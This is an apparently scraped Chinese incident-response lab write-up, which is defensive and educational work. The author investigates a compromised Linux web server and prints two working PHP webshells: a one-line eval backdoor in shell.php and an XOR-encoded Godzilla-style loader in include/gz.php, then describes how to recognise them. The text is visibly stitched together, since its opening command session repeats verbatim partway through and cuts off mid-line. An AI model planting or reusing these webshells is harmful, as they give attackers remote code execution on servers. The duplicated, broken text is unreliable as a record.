![\"image-20240613165712504\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812881.png\")
<\/div><\/p>\n![\"image-20240613172420925\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202406131812883.png\")
<\/div><\/p>\n\u67e5\u770b\u57fa\u7840\u4fe1\u606f<\/h2>\nroot@ip-10-0-10-3:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ip-10-0-10-3:~# ls -la\ntotal 44\ndrwx------ 3 root root 4096 Aug 2 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 13 09:23 ..\n-rw------- 1 root root 147 Aug 2 2023 .bash_history\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\n-rw------- 1 root root 645 Aug 2 2023 .mysql_history\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\ndrwx------ 2 root root 4096 Nov 26 2022 .ssh\n-rw------- 1 root root 10996 Aug 2 2023 .viminfo\n-rw-r--r-- 1 root root 209 Aug 2 2023 .wget-hsts\nroot@ip-10-0-10-3:~# cd \/var\/log\nroot@ip-10-0-10-3:\/var\/log# ls -la\ntotal 4244\ndrwxr-xr-x 8 root root 4096 Jun 13 09:23 .\ndrwxr-xr-x 12 root root 4096 Aug 2 2023 ..\n-rw-r--r-- 1 root root 0 Jun 13 09:23 alternatives.log\n-rw-r--r-- 1 root root 33925 Aug 2 2023 alternatives.log.1\ndrwx------ 3 root root 4096 Aug 2 2023 amazon\ndrwxr-x--- 2 root adm 4096 Aug 2 2023 apache2\ndrwxr-xr-x 2 root root 4096 Jun 13 09:23 apt\n-rw-r----- 1 root adm 393 Jun 13 09:24 auth.log\n-rw-r----- 1 root adm 23927 Jun 13 09:23 auth.log.1\n-rw-r--r-- 1 root root 600 Aug 2 2023 aws114_ssm_agent_installation.log\n-rw-r--r-- 1 root root 453632 Nov 18 2022 bootstrap.log\n-rw-rw---- 1 root utmp 0 Jun 13 09:23 btmp\n-rw-rw---- 1 root utmp 0 Nov 18 2022 btmp.1\n-rw-r--r-- 1 root adm 949278 Jun 13 09:23 cloud-init.log\n-rw-r----- 1 root adm 38266 Jun 13 09:23 cloud-init-output.log\n-rw-r----- 1 root adm 6750 Jun 13 09:25 daemon.log\n-rw-r----- 1 root adm 305545 Jun 13 09:23 daemon.log.1\n-rw-r----- 1 root adm 0 Jun 13 09:23 debug\n-rw-r----- 1 root adm 111597 Jun 13 09:23 debug.1\n-rw-r--r-- 1 root root 0 Jun 13 09:23 dpkg.log\n-rw-r--r-- 1 root root 275700 Aug 2 2023 dpkg.log.1\n-rw-r--r-- 1 root root 32032 Aug 2 2023 faillog\n-rw-r----- 1 root adm 0 Jun 13 09:23 kern.log\n-rw-r----- 1 root adm 533306 Jun 13 09:23 kern.log.1\n-rw-rw-r-- 1 root utmp 292292 Jun 13 09:24 lastlog\n-rw-r----- 1 root adm 991 Jun 13 09:23 messages\n-rw-r----- 1 root adm 480831 Jun 13 09:23 messages.1\ndrwxr-s--- 2 mysql adm 4096 Aug 2 2023 mysql\ndrwxr-xr-x 2 ntp ntp 4096 Mar 21 2019 ntpstats\n-rw------- 1 root root 2154 Jun 13 09:23 php7.3-fpm.log\ndrwx------ 2 root root 4096 Nov 26 2022 private\n-rw-r----- 1 root adm 7895 Jun 13 09:25 syslog\n-rw-r----- 1 root adm 888469 Jun 13 09:23 syslog.1\n-rw-r----- 1 root adm 837 Jun 13 09:23 user.log\n-rw-r----- 1 root adm 41907 Aug 2 2023 user.log.1\n-rw-rw-r-- 1 root utmp 46080 Jun 13 09:24 wtmp\nroot@ip-10-0-10-3:\/var\/log# ss -tulup\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port \nudp UNCONN 0 0 0.0.0.0:bootpc 0.0.0.0:* users:(("dhclient",pid=334,fd=7)) \nudp UNCONN 0 0 10.0.10.3:ntp 0.0.0.0:* users:(("ntpd",pid=451,fd=19)) \nudp UNCONN 0 0 127.0.0.1:ntp 0.0.0.0:* users:(("ntpd",pid=451,fd=18)) \nudp UNCONN 0 0 0.0.0.0:ntp 0.0.0.0:* users:(("ntpd",pid=451,fd=17)) \nudp UNCONN 0 0 [fe80::dc:2ff:fe82:5464]%eth0:ntp [::]:* users:(("ntpd",pid=451,fd=21)) \nudp UNCONN 0 0 [::1]:ntp [::]:* users:(("ntpd",pid=451,fd=20)) \nudp UNCONN 0 0 [::]:ntp [::]:* users:(("ntpd",pid=451,fd=16)) \ntcp LISTEN 0 80 127.0.0.1:mysql 0.0.0.0:* users:(("mysqld",pid=558,fd=20)) \ntcp LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:* users:(("sshd",pid=505,fd=3)) \ntcp LISTEN 0 128 *:http *:* users:(("apache2",pid=629,fd=4),("apache2",pid=628,fd=4),("apache2",pid=625,fd=4),("apache2",pid=624,fd=4),("apache2",pid=623,fd=4),("apache2",pid=562,fd=4))\ntcp LISTEN 0 128 [::]:ssh [::]:* users:(("sshd",pid=505,fd=4))<\/code><\/pre>\n\u5f00\u542f\u4e86Apache\u4ee5\u53camysql<\/p>\n
\u9ed1\u5ba2webshell\u91cc\u9762\u7684flag<\/h2>\n\u76f4\u63a5\u67e5\u627e<\/h3>\n
\u8fdb\u884c\u67e5\u627e\uff1a<\/p>\n
root@ip-10-0-10-3:\/var\/log# cd \/var\/www\/html\nroot@ip-10-0-10-3:\/var\/www\/html# ls -la\ntotal 88\ndrwxr-xr-x 8 www-data www-data 4096 Aug 2 2023 .\ndrwxr-xr-x 3 root root 4096 Aug 2 2023 ..\ndrwxr-xr-x 3 www-data www-data 4096 Mar 14 2021 admin\n-rwxr-xr-x 1 www-data www-data 280 Mar 14 2021 api.php\n-rwxr-xr-x 1 www-data www-data 891 Aug 2 2023 config.php\ndrwxr-xr-x 3 www-data www-data 4096 Aug 2 2023 data\n-rwxr-xr-x 1 www-data www-data 894 Mar 14 2021 favicon.ico\n-rwxr-xr-x 1 www-data www-data 142 Aug 2 2023 .htaccess\ndrwxr-xr-x 4 www-data www-data 4096 Aug 2 2023 include\n-rwxr-xr-x 1 www-data www-data 478 Mar 14 2021 index.php\n-rwxr-xr-x 1 www-data www-data 12744 Mar 14 2021 install.php\n-rw-r--r-- 1 www-data www-data 1080 Mar 14 2021 LICENSE\ndrwxr-xr-x 2 www-data www-data 4096 Aug 2 2023 pictures\n-rw-r--r-- 1 www-data www-data 2235 Mar 14 2021 README.md\n-rwxr-xr-x 1 www-data www-data 1049 Mar 14 2021 rss.php\n-rw-r--r-- 1 www-data www-data 38 Aug 2 2023 shell.php\n-rwxr-xr-x 1 www-data www-data 566 Mar 14 2021 sitemap.php\ndrwxr-xr-x 3 www-data www-data 4096 Mar 14 2021 template\ndrwxr-xr-x 3 www-data www-data 4096 Aug 2 2023 wap\nroot@ip-10-0-10-3:\/var\/www\/html# cat shell.php\n<?php phpinfo();@eval($_REQUEST[1]);?>root@ip-10-0-10-3:\/var\/www\/html# find .\/ -name "*.php" -type f 2>\/dev\/null\n.\/admin\/admin.php\n.\/admin\/index.php\n.\/config.php\n.\/include\/gz.php\n.\/include\/Model\/Api.php\n.\/include\/Model\/Cms.php\n.\/include\/Model\/Spider.php\n.\/include\/Model\/User.php\n.\/include\/Model\/Template.php\n.\/include\/Model\/Config.php\n.\/include\/Model\/Sql.php\n.\/include\/Model\/Article.php\n.\/include\/Model\/Datastore.php\n.\/include\/Model\/Memcached.php\n.\/include\/Model\/Upload.php\n.\/include\/Model\/Link.php\n.\/include\/Model\/File.php\n.\/include\/Model\/Base.php\n.\/include\/Model\/Category.php\n.\/include\/Model\/Index.php\n.\/include\/Model\/Comment.php\n.\/include\/Model\/Admin.php\n.\/include\/Model\/Frame.php\n.\/include\/Db\/Sqlite.php\n.\/include\/Db\/.Mysqli.php\n.\/include\/Db\/Mysqli.php\n.\/include\/Db\/Mysql.php\n.\/include\/common.php\n.\/wap\/index.php\n.\/wap\/top.php\n.\/index.php\n.\/sitemap.php\n.\/shell.php\n.\/data\/tplcache\/taoCMS\/sidebar.php\n.\/data\/tplcache\/taoCMS\/index.php\n.\/data\/tplcache\/taoCMS\/category.php\n.\/data\/tplcache\/taoCMS\/header.php\n.\/data\/tplcache\/taoCMS\/footer.php\n.\/data\/tplcache\/taoCMS\/display.php\n.\/data\/tplcache\/taoCMS\/comments.php\n.\/data\/tplcache\/wap_index.php\n.\/data\/tplcache\/menu.php\n.\/data\/tplcache\/editfile.php\n.\/data\/tplcache\/managecomment.php\n.\/data\/tplcache\/top.php\n.\/data\/tplcache\/header.php\n.\/data\/tplcache\/formsql.php\n.\/data\/tplcache\/managelink.php\n.\/data\/tplcache\/login.php\n.\/data\/tplcache\/main.php\n.\/data\/tplcache\/manageadmin.php\n.\/data\/tplcache\/footer.php\n.\/data\/tplcache\/managefile.php\n.\/data\/tplcache\/adminframe.php\n.\/rss.php\n.\/api.php\n.\/install.php\nroot@ip-10-0-10-3:\/var\/www\/html# grep -pnir "eval"\ngrep: invalid option -- 'p'\nUsage: grep [OPTION]... PATTERNS [FILE]...\nTry 'grep --help' for more information.\nroot@ip-10-0-10-3:\/var\/www\/html# grep -Pnir "eval"\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:2:if(q){try{q=eval("("+q[1]+")")}catch(t){}h=e.extend({},q,h)}q=new ra(this,h);if(q.init())this.xheditor=q,o.push(q)}});0===o.length&&(o=!1);1===o.length&&(o=o[0]);return o};var aa=0,S=!1,sa=!0,ta=!1,Sa=!1,t,ba,ca,da,K,Ea,ea,Fa,Ga,Ha,A;e("script[src*=xheditor]").each(function(){var e=this.src;if(e.match(\/xheditor[^\\\/]*\\.js\/i))return A=e.replace(\/[\\?#].*$\/,"").replace(\/(^|[\\\/\\\\])[^\\\/]*$\/,"$1"),!1});if(h){try{document.execCommand("BackgroundImageCache",!1,!0)}catch(qb){}(I=e.fn.jquery)&&I.match(\/^1\\.[67]\/)&&\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:93:var h=e(".xheFile",i);h.change(function(){d.startUpload(h[0],b,c,f)});setTimeout(function(){a.closest(".xheDialog").bind("dragenter dragover",N).bind("drop",function(a){var a=a.originalEvent.dataTransfer,e;j&&a&&(e=a.files)&&0<e.length&&d.startUpload(e,b,c,f);return!1})},10)}};this.startUpload=function(a,b,c,f){function i(a,c){var e=Object,g=!1;try{e=eval("("+a+")")}catch(i){}e.err===$||e.msg===$?alert(b+" \\u4e0a\\u4f20\\u63a5\\u53e3\\u53d1\\u751f\\u9519\\u8bef\\uff01\\r\\n\\r\\n\\u8fd4\\u56de\\u7684\\u9519\\u8bef\\u5185\\u5bb9\\u4e3a: \\r\\n\\r\\n"+\nadmin\/template\/images\/xheditor\/xheditor-1.1.14-zh-cn.min.js:99:n=r.name}catch(a){}}function l(a){r.document.write("");d.removeModal();null!=a&&c(a)}var b=e('<iframe frameborder="0" src="'+b.replace(\/{editorRoot}\/ig,A)+(\/\\?\/.test(b)?"&":"?")+"parenthost="+location.host+'" style="width:100%;height:100%;display:none;" \/><div class="xheModalIfmWait"><\/div>'),o=b.eq(0),s=b.eq(1);d.showModal(a,b,f,g,h);var r=o[0].contentWindow,n;j();o.load(function(){j();if(n){var a=!0;try{n=eval("("+unescape(n)+")")}catch(b){a=!1}if(a)return l(n)}s.is(":visible")&&(o.show().focus(),\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:20:e);if(e=e&&e.events){delete f.handle;f.events={};for(var h in e)for(var l in e[h])c.event.add(this,h,e[h][l],e[h][l].data)}}})}function Oa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function oa(a,b,d){var e=b==="width"?a.offsetWidth:a.offsetHeight;if(d==="border")return e;c.each(b==="width"?Pa:Qa,function(){d||(e-=parseFloat(c.css(a,"padding"+this))||0);if(d==="margin")e+=parseFloat(c.css(a,\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:31:!F.call(j,"constructor")&&!F.call(j.constructor.prototype,"isPrototypeOf"))return false;for(var s in j);return s===B||F.call(j,s)},isEmptyObject:function(j){for(var s in j)return false;return true},error:function(j){throw j;},parseJSON:function(j){if(typeof j!=="string"||!j)return null;j=b.trim(j);if(C.test(j.replace(J,"@").replace(w,"]").replace(I,"")))return E.JSON&&E.JSON.parse?E.JSON.parse(j):(new Function("return "+j))();else b.error("Invalid JSON: "+j)},noop:function(){},globalEval:function(j){if(j&&\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:32:l.test(j)){var s=t.getElementsByTagName("head")[0]||t.documentElement,v=t.createElement("script");v.type="text\/javascript";if(b.support.scriptEval)v.appendChild(t.createTextNode(j));else v.text=j;s.insertBefore(v,s.firstChild);s.removeChild(v)}},nodeName:function(j,s){return j.nodeName&&j.nodeName.toUpperCase()===s.toUpperCase()},each:function(j,s,v){var z,H=0,G=j.length,K=G===B||b.isFunction(j);if(v)if(K)for(z in j){if(s.apply(j[z],v)===false)break}else for(;H<G;){if(s.apply(j[H++],v)===false)break}else if(K)for(z in j){if(s.call(j[z],\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:39:scriptEval:false,noCloneEvent:true,boxModel:null,inlineBlockNeedsLayout:false,shrinkWrapBlocks:false,reliableHiddenOffsets:true};l.disabled=true;c.support.optDisabled=!k.disabled;b.type="text\/javascript";try{b.appendChild(t.createTextNode("window."+e+"=1;"))}catch(o){}a.insertBefore(b,a.firstChild);if(E[e]){c.support.scriptEval=true;delete E[e]}try{delete b.test}catch(x){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function r(){c.support.noCloneEvent=\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:54:attr:function(a,b,d,e){if(!a||a.nodeType===3||a.nodeType===8)return B;if(e&&b in c.attrFn)return c(a)[b](d);e=a.nodeType!==1||!c.isXMLDoc(a);var f=d!==B;b=e&&c.props[b]||b;var h=Ta.test(b);if((b in a||a[b]!==B)&&e&&!h){if(f){b==="type"&&Ua.test(a.nodeName)&&a.parentNode&&c.error("type property can't be changed");if(d===null)a.nodeType===1&&a.removeAttribute(b);else a[b]=d}if(c.nodeName(a,"form")&&a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b==="tabIndex")return(b=a.getAttributeNode("tabIndex"))&&\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:97:for(;u;){p.unshift(u);u=u.parentNode}for(u=m;u;){q.unshift(u);u=u.parentNode}n=p.length;m=q.length;for(u=0;u<n&&u<m;u++)if(p[u]!==q[u])return I(p[u],q[u]);return u===n?I(g,q[u],-1):I(p[u],i,1)};I=function(g,i,n){if(g===i)return n;for(g=g.nextSibling;g;){if(g===i)return-1;g=g.nextSibling}return 1}}k.getText=function(g){for(var i="",n,m=0;g[m];m++){n=g[m];if(n.nodeType===3||n.nodeType===4)i+=n.nodeValue;else if(n.nodeType!==8)i+=k.getText(n.childNodes)}return i};(function(){var g=t.createElement("div"),\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:98:i="script"+(new Date).getTime(),n=t.documentElement;g.innerHTML="<a name='"+i+"'\/>";n.insertBefore(g,n.firstChild);if(t.getElementById(i)){o.find.ID=function(m,p,q){if(typeof p.getElementById!=="undefined"&&!q)return(p=p.getElementById(m[1]))?p.id===m[1]||typeof p.getAttributeNode!=="undefined"&&p.getAttributeNode("id").nodeValue===m[1]?[p]:B:[]};o.filter.ID=function(m,p){var q=typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id");return m.nodeType===1&&q&&q.nodeValue===p}}n.removeChild(g);\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:104:c.contains=k.contains})();var Za=\/Until$\/,$a=\/^(?:parents|prevUntil|prevAll)\/,ab=\/,\/,Na=\/^.[^:#\\[\\.,]*$\/,bb=Array.prototype.slice,cb=c.expr.match.POS;c.fn.extend({find:function(a){for(var b=this.pushStack("","find",a),d=0,e=0,f=this.length;e<f;e++){d=b.length;c.find(a,this[e],b);if(e>0)for(var h=d;h<b.length;h++)for(var l=0;l<d;l++)if(b[l]===b[h]){b.splice(h--,1);break}}return b},has:function(a){var b=c(a);return this.filter(function(){for(var d=0,e=b.length;d<e;d++)if(c.contains(this,b[d]))return true})},\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:108:2,"previousSibling")},nextAll:function(a){return c.dir(a,"nextSibling")},prevAll:function(a){return c.dir(a,"previousSibling")},nextUntil:function(a,b,d){return c.dir(a,"nextSibling",d)},prevUntil:function(a,b,d){return c.dir(a,"previousSibling",d)},siblings:function(a){return c.sibling(a.parentNode.firstChild,a)},children:function(a){return c.sibling(a.firstChild)},contents:function(a){return c.nodeName(a,"iframe")?a.contentDocument||a.contentWindow.document:c.makeArray(a.childNodes)}},function(a,\nadmin\/template\/images\/xheditor\/jquery-1.4.4.min.js:144:e=a.getResponseHeader("Etag");if(d)c.lastModified[b]=d;if(e)c.etag[b]=e;return a.status===304},httpData:function(a,b,d){var e=a.getResponseHeader("content-type")||"",f=b==="xml"||!b&&e.indexOf("xml")>=0;a=f?a.responseXML:a.responseText;f&&a.documentElement.nodeName==="parsererror"&&c.error("parsererror");if(d&&d.dataFilter)a=d.dataFilter(a,b);if(typeof a==="string")if(b==="json"||!b&&e.indexOf("json")>=0)a=c.parseJSON(a);else if(b==="script"||!b&&e.indexOf("javascript")>=0)c.globalEval(a);return a}});\ninclude\/gz.php:23: eval($payload);\ninclude\/Db\/.Mysqli.php:22: eval($payload);\nshell.php:1:<?php phpinfo();@eval($_REQUEST[1]);?>\ntemplate\/taoCMS\/images\/tao.js:53: var resData=eval("["+xmlHttp.responseText+"]");<\/code><\/pre>\n\u521d\u6b65\u627e\u5230\u51e0\u4e2a\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff0c\u5728gz.php<\/code>\u627e\u5230\u4e86\u4e00\u4e2aflag\uff1a<\/p>\n# root@ip-10-0-10-3:\/var\/www\/html# cat include\/gz.php\n<?php\n@session_start();\n@set_time_limit(0);\n@error_reporting(0);\nfunction encode($D,$K){\n for($i=0;$i<strlen($D);$i++) {\n $c = $K[$i+1&15];\n $D[$i] = $D[$i]^$c;\n }\n return $D;\n}\n\/\/027ccd04-5065-48b6-a32d-77c704a5e26d\n$payloadName='payload';\n$key='3c6e0b8a9c15224a';\n$data=file_get_contents("php:\/\/input");\nif ($data!==false){\n $data=encode($data,$key);\n if (isset($_SESSION[$payloadName])){\n $payload=encode($_SESSION[$payloadName],$key);\n if (strpos($payload,"getBasicsInfo")===false){\n $payload=encode($payload,$key);\n }\n eval($payload);\n echo encode(@run($data),$key);\n }else{\n if (strpos($data,"getBasicsInfo")!==false){\n $_SESSION[$payloadName]=encode($data,$key);\n }\n }\n}<\/code><\/pre>\nD\u76fe\u626b\u63cf<\/h3>\n
\u9996\u5148\u5148\u5bf9\u7f51\u7ad9\u8fdb\u884c\u6253\u5305\uff0c\u53ef\u4ee5\u7528SFTP<\/code>\u8fdb\u884c\u4f20\u8f93\uff1a<\/p>\n![\"image-20240613173747037\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u7136\u540e\u6574\u4e2a\u4e22\u5230D\u76fe\uff1a<\/p>\n
<\/div><\/p>\n\u4e5f\u53ef\u4ee5\u627e\u5230\uff01<\/p>\n
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}<\/code><\/pre>\n\u9ed1\u5ba2\u4f7f\u7528\u7684\u4ec0\u4e48\u5de5\u5177\u7684shell<\/h2>\n
\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u6728\u9a6c\uff0c\u53d1\u73b0\u4e86\u4e00\u4e9b\u5f31\u7279\u5f81<\/p>\n
@session_start(); # \u521b\u5efa\u4f1a\u8bdd\n@set_time_limit(0); # \u8fde\u63a5\u65f6\u957f\u4e0d\u9650\n@error_reporting(0); # \u5173\u6389\u9519\u8bef\u62a5\u544a<\/code><\/pre>\n\u7136\u540e\u6211\u76f4\u63a5\u641c\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\u54e5\u65af\u62c9\u7684php\u9a6c\u5b58\u5728\u4ee5\u4e0b\u7279\u5f81\uff1a<\/p>\n
\nrun()<\/code>\u65b9\u6cd5\u662f\u5199\u6b7b\u5728\u653b\u51fb\u8377\u8f7d\u91cc\u9762\u7684\uff0c\u4ee3\u7801\u4e00\u5b9a\u4f1a\u8c03\u7528\u8fd9\u4e2a\u65b9\u6cd5\u6267\u884c\u4f20\u5165\u7684\u53c2\u6570\u3002<\/li>\n- \u6709\u4e00\u4e2a\u5411
SESSION<\/code>\u4e2d\u5b58\u50a8\u653b\u51fb\u8377\u8f7d\u7684\u8fc7\u7a0b\u3002<\/li>\n- \u4f1a\u5c06\u4f20\u5165\u7684\u53c2\u6570\u89e3\u5bc6\u3001\u62fc\u63a5\u540e\u53d6MD5\uff0c\u524d16\u4f4d\u52a0\u5230\u56de\u663e\u7684\u524d\u7aef\uff0c\u5176\u4f59\u7684\u90e8\u5206\u52a0\u5230\u56de\u663e\u7684\u540e\u7aef\uff08\u8fd9\u91cc\u597d\u50cf\u6ca1\u6709\u6d89\u53ca\u5230\uff0c\u8fd9\u4e2a\u7279\u5f81\u8fd8\u6bd4\u8f83\u660e\u663e\u7684\uff09<\/li>\n<\/ul>\n
root@ip-10-0-10-3:~# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ip-10-0-10-3:~# ls -la\ntotal 44\ndrwx------ 3 root root 4096 Aug 2 2023 .\ndrwxr-xr-x 18 root root 4096 Jun 13 09:23 ..\n-rw------- 1 root root 147 Aug 2 2023 .bash_history\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\n-rw------- 1 root root 645 Aug 2 2023 .mysql_history\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\ndrwx------ 2 root root 4096 Nov 26 2022 .ssh\n-rw------- 1 root root 10996 Aug 2 2023 .viminfo\n-rw-r--r-- 1 root root 209 Aug 2 2023 .wget-hsts\nroot@ip-10-0-10-3:~# cd \/var\/log\nroot@ip-10-0-10-3:\/var\/log# ls -la\ntotal 4244\ndrwxr-xr-x 8 root root 4096 Jun 13 09:23 .\ndrwxr-xr-x 12 root root 4096 Aug 2 2023 ..\n-rw-r--r-- 1 root root 0 Jun 13 09:23 alternatives.log\n-rw-r--r-- 1 root root 33925 Aug 2 2023 alternatives.log.1\ndrwx------ 3 root root 4096 Aug 2 2023 amazon\ndrwxr-x--- 2 root adm 4096 Aug 2 2023 apache2\ndrwxr-xr-x 2 root root 4096 Jun 13 09:23 apt\n-rw-r----- 1 root adm 393 Jun 13 09:24 auth.log\n-rw-r----- 1 root adm 23927 Jun 13 09:23 auth.log.1\n-rw-r--r-- 1 root root 600 Aug 2 2023 aws114_ssm_agent_installation.log\n-rw-r--r-- 1 root root 453632 Nov 18 2022 bootstrap.log\n-rw-rw---- 1 root utmp 0 Jun 13 09:23 btmp\n-rw-rw---- 1 root utmp 0 Nov 18 2022 btmp.1\n-rw-r--r-- 1 root adm 949278 Jun 13 09:23 cloud-init.log\n-rw-r----- 1 root adm 38266 Jun 13 09:23 cloud-init-output.log\n-rw-r----- 1 root adm 6750 Jun 13 09:25 daemon.log\n-rw-r----- 1 root adm 305545 Jun 13 09:23 daemon.log.1\n-rw-r----- 1 root adm 0 Jun 13 09:23 debug\n-rw-r----- 1 root adm 111597 Jun 13 09:23 debug.1\n-rw-r--r-- 1 root root 0 Jun 13 09:23 dpkg.log\n-rw-r--r-- 1 root root 275700 Aug 2 2023 dpkg.log.1\n-rw-r--r-- 1 root root 32032 Aug 2 2023 faillog\n-rw-r----- 1 root adm 0 Jun 13 09:23 kern.log\n-rw-r----- 1 root adm 533306 Jun 13 09:23 kern.log.1\n-rw-rw-r-- 1 root utmp 292292 Jun 13 09:24 lastlog\n-rw-r----- 1 root adm 991 Jun 13 09:23 messages\n-rw-r----- 1 root adm 480831 Jun 13 09:23 messages.1\ndrwxr-s--- 2 mysql adm 4096 Aug 2 2023 mysql\ndrwxr-xr-x 2 ntp ntp 4096 Mar 21 2019 ntpstats\n-rw------- 1 root root 2154 Jun 13 09:23 php7.3-fpm.log\ndrwx------ 2 root root 4096 Nov 26 2022 private\n-rw-r----- 1 root adm 7895 Jun 13 09:25 syslog\n-rw-r----- 1 root adm 888469 Jun 13 09:23 syslog.1\n-rw-r----- 1 root adm 837 Jun 13 09:23 user.log\n-rw-r----- 1 root adm 41907 Aug 2 2023 user.log.1\n-rw-rw-r-- 1 root utmp 46080 Jun 13 09:24 wtmp\nroot@ip-10-0-10-3:\/var\/log# ss -tulup\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port \nudp UNCONN 0 0 0.0.0.0:bootpc 0.0.0.0:* users:(("dhclient",pid=334,fd=7)) \nudp UNCONN 0 0 10.0.10.3:ntp 0.0.0.0:* users:(("ntpd",pid=451,fd=19)) \nudp UNCONN 0 0 127.0.0.1:ntp 0.0.0.0:* users:(("ntpd",pid=451,fd=18)) \nudp UNCONN 0 0 0.0.0.0:ntp 0.0.0.0:* users:(("ntpd",pid=451,fd=17)) \nudp UNCONN 0 0 [fe80::dc:2ff:fe82:5464]%eth0:ntp [::]:* users:(("ntpd",pid=451,fd=21)) \nudp UNCONN 0 0 [::1]:ntp [::]:* users:(("ntpd",pid=451,fd=20)) \nudp UNCONN 0 0 [::]:ntp [::]:* users:(("ntpd",pid=451,fd=16)) \ntcp LISTEN 0 80 127.0.0.1:mysql 0.0.0.0:* users:(("mysqld",pid=558,fd=20)) \ntcp LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:* users:(("sshd",pid=505,fd=3)) \ntcp LISTEN 0 128 *:http *:* users:(("apache2",pid=629,fd=4),("apache2",pid=628,fd=4),("apache2",pid=625,fd=4),("apache2",pid=624,fd=4),("apache2",pid=623,fd=4),("apache2",pid=562,fd=4))\ntcp LISTEN 0 128 [::]:ssh [::]:* users:(("sshd",pid=505,fd=4))<\/code><\/pre>\n\u5f00\u542f\u4e86Apache\u4ee5\u53camysql<\/p>\n
\u9ed1\u5ba2webshell\u91cc\u9762\u7684flag<\/h2>\n\u76f4\u63a5\u67e5\u627e<\/h3>\n
\u8fdb\u884c\u67e5\u627e\uff1a<\/p>\n
root@ip-10-0-10-3:\/var\/log# cd \/var\/www\/html\nroot@ip-10-0-10-3:\/var\/www\/html# ls -la\ntotal 88\ndrwxr-xr-x 8 www-data www-data 4096 Aug 2 2023 .\ndrwxr-xr-x 3 root root 4096 Aug 2 2023 ..\ndrwxr-xr-x 3 www-data www-data 4096 Mar 14 2021 admin\n-rwxr-xr-x 1 www-data www-data 280 Mar 14 2021 api.php\n-rwxr-xr-x 1 www-data www-data 891 Aug 2 2023 config.php\ndrwxr-xr-x 3 www-data www-data 4096 Aug 2 2023 data\n-rwxr-xr-x 1 www-data www-data 894 Mar 14 2021 favicon.ico\n-rwxr-xr-x 1 www-data www-data 142 Aug 2 2023 .htaccess\ndrwxr-xr-x 4 www-data www-data 4096 Aug 2 2023 include\n-rwxr-xr-x 1 www-data www-data 478 Mar 14 2021 index.php\n-rwxr-xr-x 1 www-data www-data 12744 Mar 14 2021 install.php\n-rw-r--r-- 1 www-data www-data 1080 Mar 14 2021 LICENSE\ndrwxr-xr-x 2 www-data www-data 4096 Aug 2 2023 pictures\n-rw-r--r-- 1 www-data www-data 2235 Mar 14 2021 README.md\n-rwxr-xr-x 1 www-data www-data 1049 Mar 14 2021 rss.php\n-rw-r--r-- 1 www-data www-data 38 Aug 2 2023 shell.php\n-rwxr-xr-x 1 www-data www-data 566 Mar 14 2021 sitemap.php\ndrwxr-xr-x 3 www-data www-data 4096 Mar 14 2021 template\ndrwxr-xr-x 3 www-data www-data 4096 Aug 2 2023 wap\nroot@ip-10-0-10-3:\/var\/www\/html# cat shell.php\n<?php phpinfo();@eval($_REQUEST[1]);?>root@ip-10-0-10-3:\/var\/www\/html# find .\/ -name "*.php" -type f 2>\/dev\/null\n.\/admin\/admin.php\n.\/admin\/index.php\n.\/config.php\n.\/include\/gz.php\n.\/include\/Model\/Api.php\n.\/include\/Model\/Cms.php\n.\/include\/Model\/Spider.php\n.\/include\/Model\/User.php\n.\/include\/Model\/Template.php\n.\/include\/Model\/Config.php\n.\/include\/Model\/Sql.php\n.\/include\/Model\/Article.php\n.\/include\/Model\/Datastore.php\n.\/include\/Model\/Memcached.php\n.\/include\/Model\/Upload.php\n.\/include\/Model\/Link.php\n.\/include\/Model\/File.php\n.\/include\/Model\/Base.php\n.\/include\/Model\/Category.php\n.\/include\/Model\/Index.php\n.\/include\/Model\/Comment.php\n.\/include\/Model\/Admin.php\n.\/include\/Model\/Frame.php\n.\/include\/Db\/Sqlite.php\n.\/include\/Db\/.Mysqli.php\n.\/include\/Db\/Mysqli.php\n.\/include\/Db\/Mysql.php\n.\/include\/common.php\n.\/wap\/index.php\n.\/wap\/top.php\n.\/index.php\n.\/sitemap.php\n.\/shell.php\n.\/data\/tplcache\/taoCMS\/sidebar.php\n.\/data\/tplcache\/taoCMS\/index.php\n.\/data\/tplcache\/taoCMS\/category.php\n.\/data\/tplcache\/taoCMS\/header.php\n.\/data\/tplcache\/taoCMS\/footer.php\n.\/data\/tplcache\/t